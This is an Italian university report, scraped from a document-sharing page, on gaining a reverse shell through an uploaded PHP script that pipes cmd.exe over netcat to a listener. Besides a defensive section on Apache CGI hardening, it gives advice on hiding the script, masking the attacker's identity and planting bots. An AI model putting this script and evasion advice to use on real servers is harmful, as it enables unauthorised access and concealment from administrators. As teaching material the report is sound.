Tecnica della Reverse Shell Riccardo V. Vincelli

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Tecnica della Reverse Shell Riccardo V. Vincelli 709588 r.vincelli@campus.unimib.it"

Transcript

1 Tecnica della Reverse Shell Riccardo V. Vincelli L' obiettivo della relazione e' illustrare come sia possibile, a patto di alcune assunzioni in termini di sicurezza non troppo restrittive, avere possibilita' d' esecuzione su un webserver tramite la tecnica della shell inversa. La trattazione vuole essere anche abbastanza pratica e rispecchia perlopiu' fedelmente esperienze avute dall' autore. 1. Terminologia Con il termine shell intendiamo principalmente la seguente cosa: la possibilita' di potere utilizzare un interprete dei comandi testuale del sistema attaccato (il programma comunemente detto shell appunto), e quindi essere in grado di eseguire comandi sulla stessa macchina

2 compromessa. L' effettivo file eseguibile che l' attaccante sceglie di utilizzare, dovrebbe essere uno sul quale egli ha dimestichezza: mentre questo discorso non ha troppo senso ad esempio sui sistemi Windows, dove l' interprete dei comandi e' fondamentalmente uno, il file cmd.exe o command.com su sistemi datati, sui sistemi Unix si hanno in genere vari interpreti a disposizione e quindi la scelta non e' indifferente, anche rispetto alle tracce che l' attaccante stesso lascia: ad esempio la bash (Bourne-Again SHell, evoluzione della Bourne SHell) offre di default una funzionalita' di cronologia dei comandi digitati (salvati nel file.bash_history, visualizzabili tramite il comando history e richiamabili tramite!n, dove n e' il numero del comando cosi' come appare nell' output di history) e quindi, una volta disconnessi, un amministratore di sistema puo' andare a vedere, in teoria, scoperta la compromissione, i comandi digitati che, potenzialmente, possono anche tradire l' attaccante; riprenderemo questo discorso

3 piu' avanti. Una shell si puo' ottenere in molti modi, la tecnica in esame non e' certamente la prima ad essere stata pensata ne' sicuramente la migliore. La shell piu' ambita e', ovviamente, quella di root/administrator, identificabile nella stragrande maggioranza dei sistemi *nix dal simbolo '#', ma non e' il nostro caso, almeno nella tecnica della reverse shell cosi' com'e': sarebbe potenzialmente possibile se, per assurdo, il webserver fosse eseguito da root. Con il verbo bucare intendiamo l' avere accesso esecutivo effettivo ad un sistema,ad esempio proprio avendo la possibilita' di una shell. Il termine puo' assumere significati affini, ma raggiungere il "buco" puo' anche non significare un qualcosa di troppo straordinario: se infatti si riesce ad avere possibilita' di esecuzione su una macchina non troppo performante, ad esempio, una

4 che risulta essere spesso irraggiungibile/sconnessa o con impedimenti formali elevati, per esempio si hanno i privilegi di un utente di comodo che non puo' molto (vedi sotto), l' avere bucato un sistema non e' cosa troppo gratificante per un attaccante. La parola bot (diminutivo di robot) intende un programma automatico che, una volta eseguito, non necessita stretta supervisione, cioe' non necessita' di input utente, e fa un qualcosa che l' attaccante reputa utile. Possiamo avere molti tipi di bot: per esempio, nel mondo di IRC (Internet Relay Chat), in alcune situazioni dei programmi bot sono utilizzati per mantenere il possesso di una stanza di discussione, o ancora nei giochi online modello client-server i bot fungono da giocatori automatici o supervisori della regolarita' del gioco stesso per evitare che gli utenti usino trucchi e similia. Un uso comune che si fa di una shell e' proprio quello di installare, ed eseguire,

5 programmi del tipo. Cio' si lega principalmente a due aspetti: -il bot ha necessita' di essere sempre connesso -esistono provider che offrono possibilita' di avere processi sempre in esecuzione e sempre connessi, ma al giorno d' oggi quasi nessuno di questi offre tale servizio gratuitamente. Quindi se il buco da' esito che si rivela positivo, cioe' se l' attaccante si accorge di avere in controllo una macchina soddisfacente, una possibilita' e' certo quella, se ne ha necessita', di installare suddetti bot. Vantaggi in questo senso possono essere: -l' amministratore non si accorge della compromissione se non andando a dare un occhiata ai processi in esecuzione (in *nix, comando ps), o alle connessioni attive (comandi netstat oppure sockstat) poiche' il programma determina utilizzo di risorse limitato ed e' silenzioso. -l' attaccante risparmia qualche soldo poiche' ottiene quello che dovrebbe pagare (anche se non troppo, la media e' quella di 2.5$ a

6 processo in background e connesso, per la durata di un mese) rivolgendosi a provider in modo legale. Le possibilita' di scenari bot-related sono molte, e possono spingersi anche ad ipotesi piu' marcatamente illegali anche se (forse?) piu' rare (drone-botnet, sniffing ecc...) 2. Assunzioni/prerequisiti Quello che dobbiamo avere e' possibilita' di scrittura su una macchina che permetta di eseguire da remoto degli script di un linguaggio interpretato: nella pratica mi rifaccio all' avere un account ftp su un webserver che monti perl o php nel contesto piu' ampio dello standard CGI (Common Gateway Interface, un modo W3C-compliant di gestire contenuti dinamici per siti web); il sistema operativo dev' essere Windows o Linux/*BSD (con buona approssimazione anche altri sistemi unix non troppo desueti possono andare).

7 Inutile dire che la possibilita' di scrittura puo' essere legittima (nostro caso) o illegittima, requisito minimo e' solo mettere gli script in un luogo dove possano essere raggiunti ed eseguiti dal webserver o meglio dall' interprete (ad esempio mod_perl per il server Apache). Questo scenario, a pensarci bene, non e' nulla di raro: provider come Aruba forniscono per pochi euro un servizio di questo tipo su base annuale ed al giorno d' oggi la stragrande maggioranza dei siti internet di privati e piccole-medie imprese sono operati in questo od altri molto affini modi (non sto citando nessuna fonte ma e' un fatto abbastanza immediato a chi abbia un minimo di dimestichezza nel campo). Un altro prerequisito, banale, e' quello di avere un web browser funzionante: per fortuna per quel che ci interessa, non ci serve altro che digitare un url ed attenderne l' esecuzione (tanto per intenderci, anche un browser come Lynx va piu' che bene, ma assumiamo InternetExplorer).

8 Altri strumenti che ci servono sono un netcat ed uno script per eseguire la shell remotamente, ed un programma per ricevere, localmente, la shell inviata da remoto (a tal proposito utilizzo ancora netcat). Lo script scritto da me e' molto semplice, e netcat e' un' utility free. 3. L' attacco Lo schema dell' attacco e' abbastanza semplice, ma potente: 1. Modificare lo script: la coppia indirizzo:porta cui mandarla. Attenzione se decidiamo di mandarla ad un indirizzo riconducibile a noi! (es. il pc di casa, molto riconducibile a noi direi) 2.Caricarlo (una cartella dove siamo sicuri sia raggiungibile e' quella dove si trova anche l' index o simili corrente) 3.Caricare netcat nello stesso luogo (netcat

9 remoto) 4.Mettere in ascolto il netcat locale sulla coppia indirizzo:porta scritti nello script 5. Eseguire lo script tramite url Attenzione se decidiamo di mandare la richiesta da un indirizzo riconducibile a noi! (es. non utilizzando proxy; ricordiamo poi che browser come IE lasciano una caterva di informazioni aggiuntive!) 6. Connettersi a dove abbiamo mandato la shell. Le istruzioni le ho riscritte in inglese nello script stesso. 4. Esame dei passi 4.1. Script Lo script fornito e' stato scritto pensando di attaccare un server Windows, dove la particolare scomodita' e' la presenza di un interprete di default non avanzato che non permette d' essere usato interattivamente da remoto: questo ci costringe ad appoggiarci a netcat anche per il lato server.

10 Ho conosciuto questa tecnica circa quattro anni fa, presi dal sito degli script sia in perl sia in php che fanno la stessa cosa ma in modo piu' avanzato ed anche sicuramente piu' fine: in particolare non ci si appoggia a netcat per l' interattivita' ma all' opzione -i delle shell redirigendo gli standard input, output ed error su una socket tcp. Ai tempi, per avere un' idea statistica di massima, 4 su 5 server risultavano proni. Riprovando oggi, la situazione e' inversa, infatti l' idea di hardening rispetto alla sicurezza degli script web e' cosa comune. Codice: <?php //Synopsis: //Spawn a reverse shell through netcat in a suitable cgi php context // //Usage: //-download NetCat for your platform (the attacking one): // --if you're on linux/unix you probably already have it installed // --a win version is at

11 //-on the attacking host (your box or one you control, whose ip is say ) // put netcat in listening mode on a free port: nc -l -p // On Windows I noticed that binding to a particular address is not working // properly, so the command I suggest is always fine. //-upload the script: // --you must upload it in a directory url-reachable (ie from a browser) // --it's necessary it supports script execution too (ie cgi-bin) //-upload netcat //-execute the script (ie //-on the console you issued the listening command, // you should receive the desired shell. // //This script is lame and is intended for spawning against a win box. //If you want finer examples ncindependent for the server side and //unix-targeting check out //

12 //Bugs: //The "manual" is way longer than the code itself // //Author: //RVV - $shell = 'nc.exe -v -n e cmd.exe'; exec($shell);?> Vedi "Esempio" per una dimostrazione dell' attacco Caricamento L' assunzione piu' comoda e' avere un account ftp o similia per uppare lo script in una directory raggiungibile dal webserver; ovviamente in generale e' quest' ultimo punto che ci interessa, non tanto come ci arriviamo (ftp o altro). Lo script e' un file php, testo quindi, e va inviato in modalita' ascii pertanto. Non e' generalmente necessario modificarne i permessi, ma e' auspicabile modificarne il nome in qualcosa che, se proprio non

13 inganni, quando lo legga, l' amministratore, almeno non gli sia lampante quando ci mette sopra gli occhi. Torneremo sotto sui "tempi di sopravvivenza" stimati di questo tipo di attacco Netcat Netcat (nc) e' un' utility unix portata anche a Windows soprannominata "coltellino svizzero di Internet", ed a buon diritto: puo' essere utilizzato in modo arbitrario come peer di una connessione tcp o udp, permettendo cose come modello client/server, trasferimento di dati, client raw e molte altre. Nel nostro caso ci limitiamo al comando per metterlo in ascolto: nc -l -p PORTA dove PORTA dev' essere ovviamente quella messa nello script. In un sistema Windows la porta in uso non dev' essere bloccata da firewall, in unix oltre a questo dobbiamo utilizzare, se non root (e veramente non ha senso che si sia loggati root in una situazione del genere, e piu' in generale ora non ha piu' senso essere loggati come root, esistendo utility come

14 sudo) una porta piu' alta di Esecuzione L' esecuzione si riduce al digitare l' opportuno url nel nostro browser di fiducia. Come gia' notato quest' azione, assieme all' utilizzo della shell ma anche maggiormente rispetto questa, e' una con la quale riveliamo un sacco di informazioni al webserver; non volendo entrare nel merito di browser particolari come detto sopra, la quantita' di informazioni rilasciata puo' essere valutata ad esempio all' indirizzo ; ricordando che tutti i webserver hanno una minima logging capability abilitata di default, e' un punto su cui proprio non possiamo transigere. Come noto, e' possibile utilizzare un proxy per "nascondere" l' indirizzo del browser, ma questa via non e' dopotutto il massimo perche': -non tutti i tipi di proxy sono anonimi (nel senso che inoltrano si' la connessione da parte nostra, ma comunicano la nostra identita' al webserver o mantengono log dei

15 client che servono) -di default, la funzionalita' di proxy dei browser permette di utilizzarne uno solo alla volta -i proxy sono difficili da trovare: quelli che veramente si rivelano funzionanti sono solitamente pochi ed in posti esotici (e con funzionanti intendiamo anche stabili, cioe' presenti in rete almeno per 24 ore senza troppa discontinuita'), nonche' subissati di richieste (specie se appaiono in cima a varie liste pubbliche come ); molti non sono altro che computer (spesso pc domestici) compromessi e suoi quali e' installata dal trojan/bot di turno una funzionalita' proxy, o tali in virtu' di misconfigurazioni/difetti di software applicativo (o una combinazione dei fattori: noto e' il binomio Sobig worm- Wingate v5) Un' alternativa sono fornitori di proxy/socks a pagamento (ma non ha troppo senso!). Un passo successivo in termini di ricerca d' anonimato puo' essere l' onion routing ( ). Ovviamente modi piu' sofisticati, avendo a

16 disposizione macchine esterne cui non siamo riconducibili (e che reputiamo sufficientemente insicure o "distratte" in termini di logging), sono sempre possibili: una molto in voga qualche anno fa (o meglio piu' di qualche anno fa) e' l' utilizzo di un datapipe, ossia di un piccolo programmino, in c o in perl solitamente, da eseguire sulla macchina intermediaria con principalmente tre argomenti: una porta locale su cui ascoltare in tcp, una porta ed host remoto cui mandare i dati ricevuti (una versione anche interattiva si puo' trovare a ippa_v2.txt ) Connettiamoci! Il passo finale non e' altro che connetterci dove abbiamo mandato la shell; se e' una prova o se ci fidiamo ci connetteremo a noi stessi. Pur essendo possibile riutilizzare netcat, e' molto piu' comodo il noto telnet: telnet e' un protocollo con i quali molti smanettoni hanno sicuramente confidenza, se non altro per azioni lamer ma sicuramente didattiche come provare a mandarci una mail

17 anonima o connettercisi ad IRC. 5. Concretizzazione dell' attacco Una volta dentro, dobbiamo decidere che fare; in qualsiasi caso, ci deve guidare il buonsenso. Anzitutto, avremo poteri limitati: la shell avra' i privilegi dell' utente che ha eseguito il demone http: in unix e' solitamente un utente di comodo (httpd, www, nobody ecc...), in Windows ci possiamo aspettare un utente non di default ma sicuramente non di livello amministrativo. Ricordiamo che oltre all' utilizzo di utenti di comodo, altre configurazioni di sicurezza adatte anche ad un ambiente DAC (discretionary access control) possono essere: -chrooting: un' applicazione e' "bloccata" in una sottodirectory, cioe' posta in un contesto dove ha tutti i file necessari al suo funzionamento sottoforma di hardlink ai file effettivi, e copie dei device in caso -jailing: sistema introdotto da FreeBSD che

18 prevede il partizionamento dell' os in vari sottosistemi virtuali indipendenti trasparentementemente all' utente. Notiamo che tutti queste possibilita' sono un qualcosa di nativo nei sistemi unix: per questo e per altri motivi (es. multiutenza e permessi stretti, paradigmi MAC-mandatory access control), sono da reputarsi piu' sicuri: semmai dubbi si possono avere circa la facilita' nel configurare l' ambiente adatto, e per sanare questo punto ci si puo' ad esempio aiutare con wizard grafici e con un approccio meno hardcore unix all' utilizzo dei file di configurazione (la strada presa da Mac OSX). Buonsenso e' anche rendersi conto che, comunque sia, danneggiare il sistema cancellando file su cui si hanno permessi e' deleterio: in prima battuta per una questione morale (stiamo buttando via lavoro altrui) in seconda per una pratica; un admin che si accorge di essere stato "battuto" ma non rileva danni, puo' pigramente prendere nota dell' accaduto e dimenticarsene (ecco magari non troppo pigramente, dovrebbe cercare di

19 capire come l' attaccante e' entrato!). Ma nel caso in cui abbia problemi di sorta, ad esempio un cliente del provider che possiede il webserver si ritrova lo spazio web interamente cancellato, inattivo per del tempo, e la colpa finisce sull' admin, puo' magari mettersi a spulciare, termine non correttissimo visto che esiste software che agevola il processo, i log di sistema e provare a non farla passare liscia all' attaccante. Posto che non facciamo nessuna azione che ci renda visibili (cancellazioni gratuite o anche defacciamenti dei siti), ci chiediamo ora come fare per rimanere piu' a lungo possibile invisibili (o nascosti bene) agli occhi dell' admin. La tecnica della reverse shell dovrebbe essere un punto di partenza e non di arrivo: non abbiamo in casi normali grossi privilegi e siamo dipendenti da uno script. Settarlo nascosto e "nasconderlo" in sottocartelle puo' aiutare, tutto dipende dalla frequenza con cui il sito internet e'

20 aggiornato ma soprattutto da come: se per assurdo il webmaster o chi per esso usano solo cms (content management systems) e non danno mai un occhio alla webroot per esempio via ftp, ci sono buone possibilita' per noi in questo senso, giusto per citare uno scenario. Se la vediamo appunto come partenza, il passo successivo e' ottenere quel che vogliamo dal sistema nel miglior modo possibile; e con cio' comprendiamo un range di possibilita' vasto, su cui soffermarsi sarebbe troppo lungo: nascondiamo in /tmp (dove sicuramente abbiamo accesso in scrittura) il bot che vogliamo eseguire, o iniziamo a cercare in rete un exploit locale per ottenere la root? In questa fase generalmente non possiamo prescindere dal sistema in uso, in un livello di dettaglio anche abbastanza alto: ad esempio se siamo su una linux box a kernel x.y.z.-tu, dobbiamo cercare un qualcosa appositamente per quel kernel. E' quasi impossibile trovare exploit potenti locali che sfruttino componenti native del

21 sistema come kernel, librerie famose ecc; paga molto di piu' cercare di isolare la presenza di software applicativi particolari sul sistema, ad esempio associati a servizi, e cercare attacchi per questi. Meglio ancora se proprietari o di vendor non famosissimi: in questi casi il codice quasi sicuramente chiuso facilita un eventuale successo. Certo, se l' attaccante e' veramente di alto livello, puo' contare sugli zeroday: ma questo e' un altro discorso. 6. Cure e prevenzioni Come d' obbligo, bisogna anche mettersi nei panni dell' admin: poniamo che si accorga della compromissione del sistema, cosa dovrebbe fare? La risposta e' valida in senso generale e possiamo astrarla dall' attacco particolare della reverse shell: -cercare file e processi sospetti e cancellarli, terminarli -esaminare i log di sistema ed applicativi -isolare le componenti che potrebbero nascondere la falla

22 -documentarsi circa vulnerabilita' note su queste (CVE, BugTraq, siti vendor ecc) -confrontarsi con altri colleghi -arrivare ad una soluzione E' curioso come molte volte siano gli attaccanti stessi a tendere una mano agli amministratori di sistema suggerendo la vulnerabilita' da essi sfruttata o addirittura fornendo una patch. Per le prevenzioni invece possiamo portarci piu' nello specifico proprio rispetto alla reverse shell; queste sono solo alcune delle possibili vie Disabilitare gli interpreti in questione/rinunciare alla common gateway interface: se non c'e' modo di interpretare gli script, essi ovviamente sono innocui; e' una soluzione drastica che puo' non essere accettabile se la tecnologia cgi e' parte integrante dell' uso comune del nostro webserver. Come abbiamo spesso riflettuto in aula, una risposta del tipo e' una risposta efficace ma e' un po' un' ultima spiaggia. Un' altra soluzione molto piu' logica puo'

23 essere configurare opportunamente quel che si puo' fare e non, in termini di script! Mi rifaccio ad una situazione cgi su Apache: Apache e' infatti il webserver piu' comune e tra i piu' sicuri; analoghe prevenzioni si possono avere sull' IIS di Microsoft, che sta cercando di colmare il gap ma non puo' certo contare su una community come quella di Apache. Abbiamo: httpd.conf/.htaccess httpd.conf e' il file di configurazione principale di Apache, l' abilitazione ed il settaggio del cgi passano da qui. Possiamo permettere l' esecuzione di script cgi (in un qualsiasi linguaggio adatto) in vari modi: -direttiva ScriptAlias: le directory che la seguono sono indicate al server come le uniche che in un url possono prevedere l' interpretazione di uno script; se ad esempio ho:...

24 ScriptAlias /cgibin/... l' url non determina una richiesta a buon fine dato che la cartella non e' tra quelle indicate. -direttiva Options:... <Directory /usr/local/apache2/htdocs/somedir> Options +ExecCGI </Directory>... che pero' richiede anche di specificare le estensioni d' interesse (differentemente dal modo con ScriptAlias che intende tutti i file nelle directory specificate come potenziali script):... AddHandler cgi-script.cgi.pl... Con queste indicazioni, evitando di lasciare agli utenti cartelle abilitate agli script dove ne possano mettere di loro, si raggiunge un buon livello di sicurezza. In caso in cui si voglia portare questo cgi

25 hardening ma non si abbia accesso al httpd.conf, si possono utilizzare, nei limiti definiti nel httpd.conf stesso, i file.htaccess, che non sono altro che override di quest' ultimo cui effetto e' sulla cartella in cui si trovano e tutte le sottocartelle (ad esempio ha senso metterne uno nella webroot) Controllare i file caricati E' possibile pensare ad un processo che verifichi direttamente il contenuto dei file nell' albero directory ed agisca di conseguenza: se in una cartella mi aspetto solo immagini, elimino i file che non lo sono; se in un' altra mi aspetto solo codice html, non mi basta verificare l' estensione, ma vado alla ricerca di pattern (es. #!/usr/bin/perl) in base a cui elimino file dannosi; e' possibile anche pensare ad un report program. Un semplice script del potente ambiente shell puo' essere: #!/bin/sh while true; do for file in * do a=$(file $file)

26 b=$file": PHP script text" c=$file": perl script text executable" if test "$a" = "$b" then rm -f $file elif test "$a" = "$c" then rm -f $file fi; done done dove in pratica, per ogni file nella directory dove lo script e' eseguito, se ne verifica il tipo tramite l' utility file, e se e' di tipo php o perl, lo si elimina; lo script e' semplice anche se ha come punti delicati l' assegnamento dell' output di un comando ad una variabile (costrutto $(command)) e la concatenazione di due stringhe (variabili $b e $c); attenzione anche al quoting (utilizzando '' al posto di "" abbiamo errore perche' le variabili non sono valutate). Lo script e' da posizionare nelle directory sensibili; ovviamente si possono avere script piu' complessi ad esempio che prendono l' input delle estensioni trigger da un file e controllano una lista di directory prefissata, ecc. E' preferibile eseguirlo in background (posponendo la &) e regolarne l' esecuzione in startup (ad esempio via cron).

27 Non dimentichiamo che uno script del genere puo' essere utilizzato anche su ambiente Windows: essendo il batch scripting piu' debole, si puo' talvolta pensare all' uso di ambienti d' emulazione ad-hoc come Cygwin Rinominare i file Questo metodo e' abbastanza debole se adottato in un sistema in cui l' utente attaccante ha accesso di lettura e scrittura pieno, ma buono se percaso l' utente puo' solo fare upload senza avere la possibilita' di vedere il contenuto della cartella dove carica file; cambiando il nome dei file (es. attraverso hashing), l' attaccante non sara' piu' in grado di formulare un trigger url valido; non si applica al nostro scenario dove abbiamo assunto possibilita' ftp equivalenti. 7. Conclusioni L' attacco della shell inversa ha sicuramente una sua importanza didattica, poiche' tocchiamo vari argomenti: dall' ambiente di shell ai linguaggi di scripting.

28 In termini di efficacia effettiva non e' forse esaltante: anche quando si riesca a caricare con successo, ed a fare in modo che non venga cancellato, nei limiti del possibile, lo script, le incognite sono rappresentate dal poter eseguire l' interprete dei comandi, ed il doversi fermare, almeno in prima battuta, a privilegi bassi. Piu' in generale sfruttare l' "aiuto" degli linguaggi interpretati e' una modalita' d' attacco applicata anche sotto altri nomi, e citiamo tra gli altri: SQL injection: l' attacco consiste nel presentare in una query sql dati arbitrari opportunamente scritti. Scenario tipico e' quello di un file html contenente il form ed un file in un linguaggio interpretato (es. php) incaricato di interfacciarsi col dbms per inoltrare effettivamente l' interrogazione. In caso di controlli deboli dal lato server, sono possibili situazioni di autenticazione senza credenziali ma sullo stesso paradigma e' possibile pensare anche ad arrivare alla shell

29 se il dbms espone comandi opportuni (es. "esegui comando locale"). La reverse shell e' attacco in linea generale aperto se non ai lamer nella gerarchia degli smanettoni, almeno ai kiddie: infatti le conoscenze da avere sono veramente poche ed il ritocco del codice banale (parametri host e porta): script del tipo e' suggerito modificarli leggermente (es. cancellazione d' una parentesi) per scoraggiare proprio gli utenti infimi prima di rilasciarli in the wild, anche se solo come proof of concept, che in fin dei conti non e' altro che termine eufemismo per exploit. 8. Esempio Provo ad instaurare l' attacco da macchina Windows ad un' altra ancora Windows, premettendo che sono entrambe mie, collegate in lan in modo diretto. L' ambiente web e' rappresentato, per quel che c' interessa, dal server web Apache con

30 mod_php abilitato; in particolare per fare piu' in fretta con la configurazione, ed anche perche' e' solo un esempio, ho optato per binari preconfigurati e precompilati con IndigoAMPP della software house IndigoStar. Inutile dire che scelte del tipo sono fondamentalmente sbagliate nel caso dell' allestimento di un server vero e proprio. La documentazione ufficiale Apache poi e' esauriente circa l' installazione del webserver in ambiente Windows, anche se l' ambiente di riferimento naturale e' certamente uno di stampo unix. La webroot; evidenziati i file d' attacco nc e script:

31 In ascolto sulla macchina attaccante:

32 Esecuzione dello script:

33 La shell e' arrivata! Notiamo che l' ultimo comando e' un comando dal basso buonsenso!

34 9. Webografia/link utili

Corso di Web programming Modulo T3 A2 - Web server

Corso di Web programming Modulo T3 A2 - Web server Corso di Web programming Modulo T3 A2 - Web server 1 Prerequisiti Pagine statiche e dinamiche Pagine HTML Server e client Cenni ai database e all SQL 2 1 Introduzione In questa Unità si illustra il concetto

Dettagli

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15

Scritto da Administrator Martedì 02 Settembre 2008 06:30 - Ultimo aggiornamento Martedì 10 Maggio 2011 17:15 Entrare in un pc è una espressione un po generica...può infatti significare più cose: - Disporre di risorse, quali files o stampanti, condivise, rese fruibili liberamente o tramite password con i ripettivi

Dettagli

Server web e protocollo HTTP

Server web e protocollo HTTP Server web e protocollo HTTP Dott. Emiliano Bruni (info@ebruni.it) Argomenti del corso Cenni generali sul web IIS e Apache Il server web Micsosoft Internet Information Server 5.0 Il server web Apache 2.0

Dettagli

Laboratorio di Progettazione Web

Laboratorio di Progettazione Web Il Server web Laboratorio di Progettazione Web AA 2009/2010 Chiara Renso ISTI- CNR - c.renso@isti.cnr.it E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta

Dettagli

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER

DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER DATABASE IN RETE E PROGRAMMAZIONE LATO SERVER L architettura CLIENT SERVER è l architettura standard dei sistemi di rete, dove i computer detti SERVER forniscono servizi, e computer detti CLIENT, richiedono

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

SCP: SCHEDULER LAYER. a cura di. Alberto Boccato

SCP: SCHEDULER LAYER. a cura di. Alberto Boccato SCP: SCHEDULER LAYER a cura di Alberto Boccato PREMESSA: Negli ultimi tre anni la nostra scuola ha portato avanti un progetto al quale ho partecipato chiamato SCP (Scuola di Calcolo Parallelo). Di fatto

Dettagli

Un caso concreto di risposta ad un attacco hacker

Un caso concreto di risposta ad un attacco hacker Un caso concreto di risposta ad un attacco hacker http://escher07.altervista.org Premessa Questo documento è ottenuto come generalizzazione di un caso reale. Sono stati oscurati per ovvi motivi indirizzi

Dettagli

Server dolphin: installazione e configurazione di un server web

Server dolphin: installazione e configurazione di un server web Università degli Studi G. D Annunzio Chieti Pescara GASL - Gruppo assistenza sistemistica laboratori Server dolphin: installazione e configurazione di un server web Seminario di Carlo Capuani Cos è un

Dettagli

Introduzione ai servizi di Linux

Introduzione ai servizi di Linux Introduzione ai servizi di Linux Premessa Adios è un interessante sistema operativo Linux basato sulla distribuzione Fedora Core 6 (ex Red Hat) distribuito come Live CD (con la possibilità di essere anche

Dettagli

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme.

ORIEME ITALIA SpA Viale Sarca, 45 Telefono +39 02.64.41.16.1 Orieme Italia S.p.A. I-20125 Milano Telefax +39 02.64.36.990 www.orieme. Visio Wifi Setup - Windows Rev. 1.0.0 Prerequisiti: Prima di procedere con l installazione assicurarsi di avere pieno accesso alla configurazione del router Wifi. Attenzione: non tutti i router risultano

Dettagli

Guida pratica all utilizzo di Zeroshell

Guida pratica all utilizzo di Zeroshell Guida pratica all utilizzo di Zeroshell Il sistema operativo multifunzionale creato da Fulvio.Ricciardi@zeroshell.net www.zeroshell.net Proteggere una piccola rete con stile ( Autore: cristiancolombini@libero.it

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

GLI SCRIPT DI SHELL. Lucidi a cura di B.De Carolis. UNIX shell script UdB- Dip Informatica

GLI SCRIPT DI SHELL. Lucidi a cura di B.De Carolis. UNIX shell script UdB- Dip Informatica GLI SCRIPT DI SHELL Lucidi a cura di B.De Carolis Shell Unix - Linux comandi Interfaccia di alto livello tra utente e SO. Il processore interpreta e mette in esecuzione comandi da: 1) standard input o

Dettagli

2009. STR S.p.A. u.s. Tutti i diritti riservati

2009. STR S.p.A. u.s. Tutti i diritti riservati 2009. STR S.p.A. u.s. Tutti i diritti riservati Sommario COME INSTALLARE STR VISION CPM... 3 Concetti base dell installazione Azienda... 4 Avvio installazione... 4 Scelta del tipo Installazione... 5 INSTALLAZIONE

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

2. Strutture dei Sistemi Operativi

2. Strutture dei Sistemi Operativi 1 2. Strutture dei Sistemi Operativi Quali servizi un generico sistema operativo mette a disposizione degli utenti, e dei programmi che gli utenti vogliono eseguire? interfaccia col sistema operativo stesso

Dettagli

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari

Il DBMS Oracle. Express Edition. Donatella Gubiani e Angelo Montanari Gubiani & Montanari Il DBMS Oracle 1 Il DBMS Oracle Express Edition Donatella Gubiani e Angelo Montanari Il DBMS Oracle Il DBMS Oracle Oracle 10g Express Edition Il DBMS Oracle (nelle sue versioni più

Dettagli

MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com

MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com MySQL Controllare gli accessi alla base di dati A cura di Silvio Bonechi per http://www.pctrio.com 15.03.2006 Ver. 1.0 Scarica la versione pdf ( MBytes) Nessuno si spaventi! Non voglio fare né un manuale

Dettagli

Il Web Server e il protocollo HTTP

Il Web Server e il protocollo HTTP Corso PHP Parte 2 Il Web Server e il protocollo HTTP E un programma sempre attivo che ascolta su una porta le richieste HTTP. All arrivo di una richiesta la esegue e restituisce il risultato al browser,

Dettagli

Corso di PHP. Prerequisiti. 1 - Introduzione

Corso di PHP. Prerequisiti. 1 - Introduzione Corso di PHP 1 - Introduzione 1 Prerequisiti Conoscenza HTML Principi di programmazione web Saper progettare un algoritmo Saper usare un sistema operativo Conoscere il concetto di espressione 2 1 Introduzione

Dettagli

Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL)

Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL) Guida al Controllo Remoto del proprio PC con VNC e Fastweb (Versione SSL) Ver. 1.0 rev.1.1 del 14/12/2003 By EnergyDrink emailto:energydrink@fastwebnet.it Questa che segue, e una delle possibili soluzioni

Dettagli

Siti interattivi e dinamici. in poche pagine

Siti interattivi e dinamici. in poche pagine Siti interattivi e dinamici in poche pagine 1 Siti Web interattivi Pagine Web codificate esclusivamente per mezzo dell HTML non permettono alcun tipo di interazione con l utente, se non quella rappresentata

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione

Sommario. Introduzione ai firewall. Firewall a filtraggio dei pacchetti. Il firewall ipfw. Definizione e scopo Classificazione Sesta Esercitazione Sommario Introduzione ai firewall Definizione e scopo Classificazione Firewall a filtraggio dei pacchetti Informazioni associate alle regole Interpretazione delle regole Il firewall

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 3 - Web Server Apache (1) Chiara Braghin chiara.braghin@unimi.it!

